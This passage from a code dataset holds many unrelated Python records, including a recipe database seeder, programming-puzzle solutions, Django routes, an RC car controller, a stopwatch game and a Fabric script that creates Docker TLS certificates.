get_close_matches(word=tag_name_parsed, possibilities=tag_names, cutoff=0.6)\n assert len(tag_searchs) > 0\n\n tag = tags[tag_names.index(tag_searchs[0])]\n recipe_tags.append(RecipeTagRelation(recipe=len(recipes), tag=tag))\n step_no += 1\n\nRecipe.bulk_create(recipes)\nRecipeIngredientRelation.bulk_create(recipe_ingredients)\nStep.bulk_create(steps)\nRecipeTagRelation.bulk_create(recipe_tags)\n\n# Step 6: Subscriptions\nsubscriptions = []\nrandom.seed(1993)\nsubscription_id = 0\nfor toUserId in range(len(users)):\n if toUserId == 20:\n fromUserIds = [i for i in range(len(users)) if i != 20]\n else:\n random.seed(1993 + toUserId)\n numFromUserId = random.randint(0, len(users) - 1)\n random.seed(1993 + toUserId + 10)\n fromUserIds = random.sample(range(len(users)), numFromUserId)\n\n if 0 not in fromUserIds:\n fromUserIds.append(0)\n\n if toUserId in fromUserIds:\n fromUserIds.remove(toUserId)\n\n for fromUserId in fromUserIds:\n subscriptions.append(SubscriptionRelation(from_user=fromUserId + 1, to_user=toUserId + 1))\n subscription_id += 1\n\nSubscriptionRelation.bulk_create(subscriptions)\n\n# Step 7: Likes\nlikes = []\nrandom.seed(1993)\nfor fromUserId in range(len(users)):\n random.seed(1993 + fromUserId)\n numLikeRecipe = random.randint(0, len(recipes) - 1)\n random.seed(1993 + fromUserId + 10)\n likeRecipes = random.sample(range(len(recipes)), numLikeRecipe)\n\n for likeRecipe in likeRecipes:\n likes.append(LikeRelation(user=fromUserId + 1, recipe=likeRecipe + 1))\n\nLikeRelation.bulk_create(likes)\n\n# Step 8: Comments\nwith Path('data/comments.txt').open('r') as f:\n comment_texts = f.readlines()\n comment_texts = [c.strip() for c in comment_texts if c.strip()]\n\ncomment_now_texts = comment_texts\ncomments = []\nfor fromUserId in range(len(users)):\n for recipeId in range(len(recipes)):\n random.seed(1993 + fromUserId + recipeId)\n haveComment = random.randint(0, 10)\n if haveComment > 8:\n random.seed(2993 + fromUserId)\n numCommentTexts = random.randint(1, 3)\n random.seed(5993 + fromUserId)\n if numCommentTexts > len(comment_now_texts):\n comment_now_texts = comment_texts\n\n comment_selected_idxs = random.sample(range(len(comment_now_texts)), numCommentTexts)\n for c in comment_selected_idxs:\n 
comments.append(Comment(user=fromUserId + 1, recipe=recipeId + 1, text=comment_texts[c]))\n                    comment_now_texts.remove(comment_texts[c])\n\nComment.bulk_create(comments)\n","sub_path":"back-end/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"526687248","text":"'''\n\n\nSherlock Holmes suspects his archenemy Professor Moriarty is once again plotting something diabolical. Sherlock's companion, Dr. Watson, suggests Moriarty may be responsible for MI6's recent issues with their supercomputer, The Beast.\n\nShortly after resolving to investigate, Sherlock receives a note from Moriarty boasting about infecting The Beast with a virus. He also gives him a clue: an integer. Sherlock determines the key to removing the virus is to find the largest Decent Number having that number of digits.\n\nA Decent Number has the following properties:\n\nIts digits can only be 3's and/or 5's.\nThe number of 3's it contains is divisible by 5.\nThe number of 5's it contains is divisible by 3.\nIt is the largest such number for its length.\nMoriarty's virus shows a clock counting down to The Beast's destruction, and time is running out fast. Your task is to help Sherlock find the key before The Beast is destroyed!\n\nFor example, the numbers 55533333 and 555555 are both decent numbers because there are three 5's and five 3's in the first, and six 5's in the second. They are the largest values for those length numbers that have proper divisibility of digit occurrences.\n\nFunction Description\n\nComplete the decentNumber function in the editor below.\n\ndecentNumber has the following parameter(s):\n\nint n: the length of the decent number to create\nPrints\n\nPrint the decent number for the given length, or -1 if a decent number of that length cannot be formed. 
No return value is expected.\n\nInput Format\n\nThe first line is an integer, t, the number of test cases.\n\nThe next t lines each contain an integer n, the number of digits in the number to create.\n\nConstraints\n\n\n\nSample Input\n\nSTDIN Function\n----- --------\n4 t = 4\n1 n = 1 (first test case)\n3 n = 3 (second test case)\n5\n11\nSample Output\n\n-1\n555\n33333\n55555533333\n\n'''\n\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the decentNumber function below.\ndef decentNumber(n):\n    if n % 3 == 0:\n        print('5' * n) \n    elif n % 3 == 1 and n >= 10:\n        print( '5'* (n - 10) + '3' * (10))\n    elif n % 3 == 2 and n >= 5: \n        print('5' *(n - 5) + '3' * (5))\n    else:\n        print(-1) \n    return \nif __name__ == '__main__':\n    t = int(input().strip())\n\n    for t_itr in range(t):\n        n = int(input().strip())\n\n        decentNumber(n)\n","sub_path":"Day 96/SherlockAndTheBeast.py","file_name":"SherlockAndTheBeast.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"66739727","text":"# 11 Feb 2005\tFix update of summary table\n\nimport mx.DateTime\nimport iemdb\nIEM = iemdb.connect('iem')\nicursor = IEM.cursor()\n\ntoday = mx.DateTime.now()\nsql = \"\"\"update summary_%s s SET max_gust = 0 \n    FROM stations t WHERE t.iemid = s.iemid and day = 'TODAY' and max_gust_ts < '%s 00:05' and\n    t.network in ('KCCI','KIMT','KELO')\"\"\" % (\n    today.year, today.strftime(\"%Y-%m-%d\"),)\nicursor.execute(sql)\nicursor.close()\nIEM.close()\n","sub_path":"scripts/qc/correctGusts.py","file_name":"correctGusts.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"34499069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport uuid\n\nfrom unittest import TestCase\n\nfrom hestia.tz_utils import local_now\nfrom marshmallow import ValidationError\nfrom tests.utils import assert_equal_dict\n\nfrom polyaxon_schemas.api.experiment import ExperimentConfig\nfrom polyaxon_schemas.api.group import GroupConfig\nfrom polyaxon_schemas.api.project import ProjectConfig\n\n\nclass TestProjectConfigs(TestCase):\n    def test_validate_project_name_config(self):\n        config_dict = {'name': 'test sdf', 'description': '', 'is_public': True}\n        with self.assertRaises(ValidationError):\n            ProjectConfig.from_dict(config_dict)\n\n    def test_project_config(self):\n        config_dict = {\n            'name': 'test',\n            'description': '',\n            'is_public': True,\n            'has_code': True,\n            'has_tensorboard': True,\n            'tags': ['foo'],\n            'num_experiments': 0,\n            'num_independent_experiments': 0,\n            'num_experiment_groups': 0,\n            'num_jobs': 0,\n            'num_builds': 0,\n            'created_at': local_now().isoformat(),\n            'updated_at': local_now().isoformat()\n        }\n        config = ProjectConfig.from_dict(config_dict)\n        config_to_dict = config.to_dict()\n        config_to_dict.pop('id', None)\n        config_to_dict.pop('experiment_groups', None)\n        config_to_dict.pop('experiments', None)\n        config_to_dict.pop('has_notebook', None)\n        config_to_dict.pop('unique_name', None)\n        config_to_dict.pop('user', None)\n        config_to_dict.pop('owner', None)\n        config_to_dict.pop('uuid', None)\n        assert config_to_dict == config_dict\n        config_dict.pop('description')\n        config_dict.pop('updated_at')\n        config_dict.pop('has_code')\n        config_to_dict = config.to_light_dict()\n        config_to_dict.pop('has_notebook', None)\n        config_to_dict.pop('unique_name', None)\n        assert config_to_dict 
== config_dict\n\n config_to_dict = config.to_dict(humanize_values=True)\n assert config_to_dict.pop('created_at') == 'a few seconds ago'\n assert config_to_dict.pop('updated_at') == 'a few seconds ago'\n\n config_to_dict = config.to_light_dict(humanize_values=True)\n assert config_to_dict.pop('created_at') == 'a few seconds ago'\n\n def test_project_experiments_and_groups_config(self):\n uuid_value = uuid.uuid4().hex\n config_dict = {'name': 'test',\n 'description': '',\n 'is_public': True,\n 'experiment_groups': [\n GroupConfig(content='content',\n uuid=uuid_value,\n project=uuid_value).to_dict()],\n 'experiments': [\n ExperimentConfig(uuid=uuid_value,\n project=uuid_value).to_dict()]}\n config = ProjectConfig.from_dict(config_dict)\n assert_equal_dict(config_dict, config.to_dict())\n\n config_dict.pop('description')\n config_dict.pop('experiment_groups')\n config_dict.pop('experiments')\n assert_equal_dict(config_dict, config.to_light_dict())\n","sub_path":"tests/test_api/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87866020","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\nclass install(_install):\n def pre_install_script(self):\n pass\n\n def post_install_script(self):\n pass\n\n def run(self):\n self.pre_install_script()\n\n _install.run(self)\n\n self.post_install_script()\n\nif __name__ == '__main__':\n setup(\n name = 'aws-monocyte',\n version = '0.3.509-312',\n description = '''Monocyte - Search and Destroy unwanted AWS Resources relentlessly.''',\n long_description = '''\n Monocyte is a bot for destroying AWS resources in non-EU regions written in Python using Boto.\n It is especially useful for companies that are bound to European privacy laws\n and for that reason don't want to process user data in non-EU regions.\n ''',\n author = \"Jan Brennenstuhl, Arne Hilmann\",\n author_email = \"jan@brennenstuhl.me, arne.hilmann@gmail.com\",\n license = 'Apache License 2.0',\n url = 'https://github.com/ImmobilienScout24/aws-monocyte',\n scripts = ['scripts/monocyte'],\n packages = [\n 'monocyte',\n 'monocyte.plugins',\n 'monocyte.handler'\n ],\n py_modules = [],\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Programming Language :: Python',\n 'Topic :: System :: Networking',\n 'Topic :: System :: Software Distribution',\n 'Topic :: System :: Systems Administration'\n ],\n entry_points = {},\n data_files = [],\n package_data = {},\n install_requires = [\n 'boto',\n 'boto3',\n 'docopt',\n 'mock',\n 'pils',\n 'python-cloudwatchlogs-logging',\n 'yamlreader'\n ],\n dependency_links = [],\n zip_safe=True,\n cmdclass={'install': install},\n )\n","sub_path":"pypi_install_script/aws-monocyte-0.3.509.post312.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302648572","text":"import paho.mqtt.client as mqtt\nimport json\n\nimport sys\n\ndef on_connect(client, userdata, flags, rc):\n # 연결이 성공적으로 된다면 완료 메세지 출력\n if rc == 0:\n print(\"completely connected\")\n else:\n print(\"Bad connection Returned code=\", rc)\n\n# 연결이 끊기면 출력\ndef on_disconnect(client, userdata, flags, rc=0):\n print(str(rc))\n\n\ndef on_publish(client, 
userdata, mid):\n print(\"In on_pub callback mid= \", mid)\n\n# 새로운 클라이언트 생성\nclient = mqtt.Client()\n\n# 콜백 함수 설정 on_connect(브로커에 접속), on_disconnect(브로커에 접속중료), on_publish(메세지 발행)\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.on_publish = on_publish\n\n# address : localhost\n# port: 1883 에 연결\nclient.connect('localhost', 1883)\nclient.loop_start()\n\n# topic 으로 메세지 발행\nprint(str(sys.argv))\ncommand = sys.argv[1]\nclient.publish('test', command, 1)\nclient.loop_stop()\n\n# 연결 종료\nclient.disconnect()","sub_path":"face_recog_mqtt_pub.py","file_name":"face_recog_mqtt_pub.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239910867","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n My third task for Assignment 11 where a user inputs a text file from which words representing each letter of the alphabet are compiled into their own dictionary. Each dictionary output is printed into a new, tab-delineated text file...giving a total of 26 files (one per letter in alphabet).\n\n Created by A.J. Turner on March 1, 2016. Helpful instructions/hints provided by S. Shakya.\n Copyright 2016 A.J. Turner. All rights reserved.\n\n\"\"\"\n\nimport argparse\nimport re\nimport os.path\nimport string\n\n\ndef user_files():\n\t\"\"\" adding user input that includes the name of the file to read and the name of the output file they write\"\"\"\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--file_in\", help=\"Type into command line: --file_in \", type=str)\n\targs = parser.parse_args()\n\treturn args\n\n\ndef all_letters(file,letter):\n\t\"\"\" separating words in input file by alphabetic letter and keeping associated counts\"\"\"\n\t#alphabetically grouped word\\tcount lists\n\tget_letter = re.findall(r'\\b['+letter+']\\w+\\t\\d+', file)\n\tlets = {} #dictionary placeholder for below\n\tfor word_num in get_letter: #iterate over each word in alphabetic list grouping\n\t\tsplit_word = word_num.split('\\t')\n\t\tlets[split_word[0]] = split_word[1]#creating dictionary with word/count\\\n\t\t#for each alphabetic group\n\treturn lets\n\n\ndef main():\n\targs = user_files()\n\twith open(args.file_in, 'r') as file_in:\n\t\tf = file_in.read()\n\t\tfile_in.close()\n\t\talphabet = list(string.ascii_lowercase) #getting all letts of alphabet as list\n\t\tfor letter in alphabet: #iterating over the alphabet, one letter at a time\n\t\t\tlets = all_letters(f, letter) #calling dictionaries from function two\n\t\t\tout_file = os.path.join(os.getcwd(), letter.upper()+'-words-'+args.file_in)\n\t\t\twith open(out_file, 'w') as out_file:\n\t\t\t#putting dictionary for each word grouping into a file\n\t\t\t\tfor key,value in lets.items():\n\t\t\t\t\tout_file.write(\"{}\\t{}\\n\".format(key, value))\n\t\t\t\tout_file.close()\t\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"answers/turneraj/a11task3.py","file_name":"a11task3.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"90051584","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\UnityPy\\classes\\MonoBehaviour.py\n# Compiled at: 2020-03-30 16:40:06\n# Size of source mod 2**32: 288 bytes\nfrom .Behaviour import Behaviour\nfrom .PPtr import PPtr\n\nclass 
MonoBehaviour(Behaviour):\n\n def __init__(self, reader):\n super().__init__(reader=reader)\n self.script = PPtr(reader)\n self.name = reader.read_aligned_string()\n self.read_type_tree()","sub_path":"pycfiles/UnityPy-1.3.0-py3.6/MonoBehaviour.cpython-36.py","file_name":"MonoBehaviour.cpython-36.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"408378322","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/lazy_slides/download.py\n# Compiled at: 2012-03-17 18:14:01\nimport contextlib, logging, os, urllib2, urlparse, uuid\nlog = logging.getLogger(__name__)\n\ndef download(url, directory):\n \"\"\"Download a file specified by a URL to a local file.\n\n This generates a unique name for the downloaded file and saves\n into that.\n\n :param url: The URL to download.\n :param directory: The directory into which to save the file.\n \"\"\"\n parsed = urlparse.urlparse(url)\n filename = os.path.split(parsed.path)[1]\n filename_comps = os.path.splitext(filename)\n filename = ('{}_{}{}').format(filename_comps[0], uuid.uuid4(), filename_comps[1])\n filename = os.path.join(directory, filename)\n log.info(('Downloading {} to {}').format(url, filename))\n with contextlib.closing(urllib2.urlopen(url)) as (infile):\n with open(filename, 'wb') as (outfile):\n outfile.write(infile.read())\n return filename","sub_path":"pycfiles/lazy_slides-0.3-py2.7/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"471871105","text":"import serial\nimport cv2\nimport math\nimport wiringpi\nimport RPi.GPIO as GPIO\nimport socket\nimport time\nimport pdb\n\nGPIO.setwarnings(False)\n\n# referring to the pins by GPIO numbers\nGPIO.setmode(GPIO.BCM)\n\n# define pi GPIO\nGPIO_TRIGGER = 23\nGPIO_ECHO = 24\n\n# output pin: Trigger\nGPIO.setup(GPIO_TRIGGER,GPIO.OUT)\n# input pin: Echo\nGPIO.setup(GPIO_ECHO,GPIO.IN)\n# initialize trigger pin to low\nGPIO.output(GPIO_TRIGGER, False)\n\ntime.sleep(2)\n\nclass RCControl(object):\n\n\tdef __init__(self):\n\n\t\tself.server_socket = socket.socket()\n\t\tself.server_socket.bind(('192.168.0.114', 1234)) #pi\n\t\tself.server_socket.listen(0)\n\t\tself.connection= self.server_socket.accept()[0]\n\n\t\twiringpi.wiringPiSetup()\n\t\twiringpi.pinMode(21, 1) \n\t\twiringpi.pinMode(22, 1)\n\t\twiringpi.pinMode(23, 1)\n\t\twiringpi.pinMode(24, 1)\n\t\t\n\t\tGPIO.setwarnings(False)\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setup(8, GPIO.OUT, initial= GPIO.LOW) #left\n\t\tGPIO.setup(4, GPIO.OUT, initial= GPIO.LOW) #red\n\t\tGPIO.setup(7, GPIO.OUT, initial= GPIO.LOW) #right\n\n\tdef steer(self):\n\t\ttry:\n\t\t\twhile(True):\n\t\t\t\tsep = ' '\n\t\t\t\tbuf = b''\n\t\t\t\twhile sep not in buf:\n\t\t\t\t\tbuf+=self.connection.recv(1024)\n\t\t\t\t\n\t\t\t\tprediction = str(buf)\n\t\t\t\tdistance = self.measure()\n\t\t\t\tprint(distance)\n\t\t\t\t\n\t\t\t\tif distance > 30.0 :\n\t\t\t\t\tif prediction == \"2 \":\n\t\t\t\t\t\tprint(\"Forward\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn 
on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telif prediction == \"0 \":\n\t\t\t\t\t\tprint(\"Left\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 1)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 0)\n\t\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t\t\tGPIO.output(8, GPIO.HIGH) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telif prediction == \"1 \":\n\t\t\t\t\t\tprint(\"Right\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 1)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.HIGH) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.LOW)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.stop()\n\t\t\t\t\t\tprint(\"Stop\")\n\t\t\t\t\t\twiringpi.digitalWrite(21, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(22, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(23, 0)\n\t\t\t\t\t\twiringpi.digitalWrite(24, 0)\n\n\t\t\t\t\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\t\t\t\t\tGPIO.output(4, GPIO.HIGH)\n\n\t\t\t\telse:\n\t\t\t\t\tself.stop()\n\t\t\t\t\tprint(\"Obstacle ahead!\")\n\t\t\t\t\t\n\t\tfinally:\n\t\t\t#self.connection.close()\n\t\t\tself.server_socket.close()\n\t\t\tGPIO.cleanup()\n\n\tdef stop(self):\n\t\twiringpi.digitalWrite(21, 0)\n\t\twiringpi.digitalWrite(22, 0)\n\t\twiringpi.digitalWrite(23, 0)\n\t\twiringpi.digitalWrite(24, 0)\n\n\t\tGPIO.output(8, GPIO.LOW) # Turn on\n\t\tGPIO.output(7, GPIO.LOW) # Turn on\n\t\tGPIO.output(4, GPIO.HIGH)\n\n\tdef measure(self):\n\t\t\"\"\"\n\t\tmeasure distance\n\t\t\"\"\"\n\t\tGPIO.output(GPIO_TRIGGER, True)\n\t\ttime.sleep(0.00001)\n\t\tGPIO.output(GPIO_TRIGGER, False)\n\t\tstart = time.time()\n\n\t\twhile GPIO.input(GPIO_ECHO)==0:\n\t\t\tstart = time.time()\n\n\t\twhile GPIO.input(GPIO_ECHO)==1:\n\t\t\tstop = time.time()\n\n\t\telapsed = stop-start\n\t\tdistance = (elapsed * 34300)/2\n\t\tdistance = round(distance, 1)\n\t\treturn distance\n\n\nif __name__ == '__main__':\n\trc=RCControl()\n\trc.steer()\n","sub_path":"neural networks/test/pitest.py","file_name":"pitest.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"350869527","text":"import math\n\nn = int(input().strip())\n\ndef isPalindromic(num):\n num_str = str(num)\n if num_str == num_str[::-1]:\n return True\n return False\n\ndef doesFactorize(num):\n start_factor = math.floor(math.sqrt(num))\n for i in range(start_factor,99,-1):\n if num % i == 0:\n other_factor = num // i\n if 100 < i < 1000 and 100 < other_factor < 1000:\n return True\n return False\n\nfor i in range(n):\n N = int(input().strip())\n for num in range(N,101100,-1):\n if isPalindromic(num) and doesFactorize(num):\n print(num)\n break\n\n\n\n\n\n\n\n\n","sub_path":"Project Euler/ProjectEuler_4.py","file_name":"ProjectEuler_4.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19120960","text":"from src.data_struc.deque.deque import Deque\n\n\n# Example realization palindrome checker\ndef palindrome(a_string):\n\n d = Deque() # Create deque\n\n for char in a_string:\n d.add_rear(char) # Add string char by char to deque\n\n equal = True\n\n while equal and d.size() > 1:\n first = d.remove_front() # Pop element from front\n last = 
d.remove_rear() # Pop element from rear\n        if first != last: # Compare elements\n            equal = False\n\n    return equal\n\n\nprint(palindrome('madam'))","sub_path":"src/data_struc/deque/palindrome_checker.py","file_name":"palindrome_checker.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"255826060","text":"from django.urls import path\nfrom bowling.views import (\n    RowListView,\n    RowDetailView,\n    RowSessionDetailView,\n    RowSessionCreateView,\n    RowSessionUpdateView,\n    PlayerCreateView,\n    PlayerUpdateView,\n    make_throws\n)\n# NOTE: the <int:pk> converters below are assumed; the original angle-bracket\n# URL parameters were lost in extraction (e.g. row_session//update).\nurlpatterns = [\n    path(\"row/\", RowListView.as_view(), name=\"row-list\" ),\n    path(\n        \"row/<int:pk>\",\n        RowDetailView.as_view(),\n        name=\"row-detail\"\n    ),\n    path(\n        \"row_session/create\",\n        RowSessionCreateView.as_view(),\n        name=\"row_session-create\"\n    ),\n    path(\n        \"row_session/<int:pk>/update\",\n        RowSessionUpdateView.as_view(),\n        name=\"row_session-update\"\n    ),\n    path(\"row_session/<int:pk>\",\n        RowSessionDetailView.as_view(),\n        name=\"row_session-detail\"\n    ),\n    path(\"row_session/<int:pk>/throws\",\n        make_throws,\n        name=\"row_session-throws\"\n    ),\n    path(\"player/create\",\n        PlayerCreateView.as_view(),\n        name=\"player-create\"\n    ),\n    path(\"player/<int:pk>/update\",\n        PlayerUpdateView.as_view(),\n        name=\"player-update\"\n    ),\n    # path(\"car/<int:pk>\", CarDetailView.as_view(), name=\"car-detail\" ),\n]\n","sub_path":"bowling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"606663242","text":"#assignment 3: STOPWATCH\n\n#http://www.codeskulptor.org/#user40_pzrY0uGl4PsTfgp_24.py\n\n# template for \"Stopwatch: The Game\"\nimport simplegui\n# define global variables\ntime = 0\nclick_counter = 0\npoint_counter = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n    A = t / 600\n    B = ((t / 10) % 60) // 10\n    C = ((t / 10) % 60) % 10\n    D = (t % 60) % 10\n    \n    return str(A) + \":\" + str(B) + str(C) + \".\" + str(D)\n    \n    \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n    timer.start()\ndef stop():\n    global click_counter\n    global point_counter\n    if timer.is_running() == True:\n        timer.stop()\n        click_counter += 1\n        if time % 10 == 0:\n            point_counter += 1\n    else:\n        timer.stop()\n    \ndef play():\n    global click_counter\n    global point_counter\n    if timer.is_running() == True:\n        timer.stop()\n        click_counter += 1\n        if time % 10 == 0:\n            point_counter += 1\n    elif timer.is_running() == False:\n        timer.start()\n    \n    \n    \n    \n    \ndef reset(): \n    global time\n    global click_counter\n    global point_counter\n    timer.stop()\n    time = 0\n    click_counter = 0\n    point_counter = 0\n    \n\n    \n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n    global time\n    time += 1 \n    \n    \n    \n    \n# define draw handler\ndef draw(canvas):\n    global time\n    canvas.draw_text(str(format(time)), [100, 200], 80, \"White\")\n    canvas.draw_text(str(point_counter) + \"/\" + str(click_counter),\\\n    [300, 50], 25, \"White\") \n    \n# create frame\nframe = simplegui.create_frame(\"Stopwatch_the_Game\", 400, 400)\ntimer = simplegui.create_timer(100, timer_handler)\n\n\n# register event handlers\nframe.add_button('Play', play, 200)\n\nframe.add_button('Start', start, 200)\nframe.add_button('Stop', stop, 200)\nframe.add_button('Reset', reset, 200)\nframe.set_draw_handler(draw)\nframe.set_canvas_background('Black')\n\n# start 
frame\nframe.start()\n\n\n\n\n\n\n","sub_path":"Stopwatch.py","file_name":"Stopwatch.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605609618","text":"'''\nDocker host and client utilities\n'''\nfrom datetime import datetime\n\nfrom fabric.api import *\nfrom fabric.contrib import *\n\n# needed for adding users\n# from confighelper import ConfigHelper\n\n@task\ndef create_and_install_certs(do_client_certs=False, do_server_certs=False, hostname=''):\n '''\n This create and install client and server (host) keys for TLS auth and crypto for docker client.\n\n Default for the two install operations is false, add :true,true to do it for real.\n\n Example:\n fab docker.create_and_install_certs --hosts=atomic-v1-aws.tinisi.local -u centos\n '''\n if ( not hostname ):\n hostname = env.host_string\n\n working_dir = _create_working_dir()\n\n # always create these, should be safe\n create_host_certs(working_dir=working_dir, hostname=hostname)\n create_client_certs(working_dir=working_dir, hostname=hostname)\n\n if do_client_certs:\n install_client_certs(working_dir=working_dir, hostname=hostname)\n\n if do_server_certs:\n install_server_certs(working_dir=working_dir, hostname=hostname)\n\n@task\ndef create_host_certs(working_dir='', hostname=''):\n '''\n This will set up a CA and server (docker host) keys.\n '''\n\n if ( not hostname ):\n hostname = env.host_string\n\n # this is from:\n # https://docs.docker.com/engine/security/https/\n\n if ( not working_dir ):\n working_dir = _create_working_dir()\n\n with cd(working_dir):\n # this creates the private key for our CA\n run('openssl genrsa -aes256 -out ca-key.pem 4096')\n # Enter pass phrase for ca-key.pem:\n # Verifying - Enter pass phrase for ca-key.pem:\n\n # this creates the public key for our CA\n # TODO: deal with prompt\n run('openssl req -new -x509 -days 365 -key ca-key.pem -sha256 -out ca.pem')\n\n # this creates a server key and CSR\n # TODO: deal with prompt\n run('openssl genrsa -out server-key.pem 4096')\n\n # this makes a CSR\n run('openssl req -subj \"/CN={hostname}\" -sha256 -new -key server-key.pem -out server.csr'.format(hostname=hostname))\n\n # create a conf file with allowed IP's\n # add a second such as IP:10.10.10.20,IP:127.0.0.1 to specify more than one IP\n # not actually sure this is needed\n run('echo subjectAltName = IP:10.10.10.20,IP:127.0.0.1 > extfile.cnf')\n\n # it signs the key\n run('openssl x509 -req -days 365 -sha256 -in server.csr -CA ca.pem -CAkey ca-key.pem \\\n-CAcreateserial -out server-cert.pem -extfile extfile.cnf')\n\n # this is the config to make the demon use tlsverify\n # docker daemon --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=0.0.0.0:2376\n\n@task\ndef create_client_certs(working_dir='', hostname=''):\n '''\n This creates certs to be used for a client.\n '''\n\n if ( not hostname ):\n hostname = env.host_string\n\n if ( not working_dir ):\n working_dir = _create_working_dir()\n\n with cd(working_dir):\n\n run('openssl genrsa -out key.pem 4096')\n\n run('openssl req -subj \\'/CN=client\\' -new -key key.pem -out client.csr')\n\n run('echo extendedKeyUsage = clientAuth > client_extfile.cnf')\n\n run('openssl x509 -req -days 365 -sha256 -in client.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out cert.pem -extfile client_extfile.cnf')\n\n run('rm -v client.csr server.csr')\n\n run('chmod -v 0400 ca-key.pem key.pem server-key.pem')\n\n run('chmod -v 0444 ca.pem 
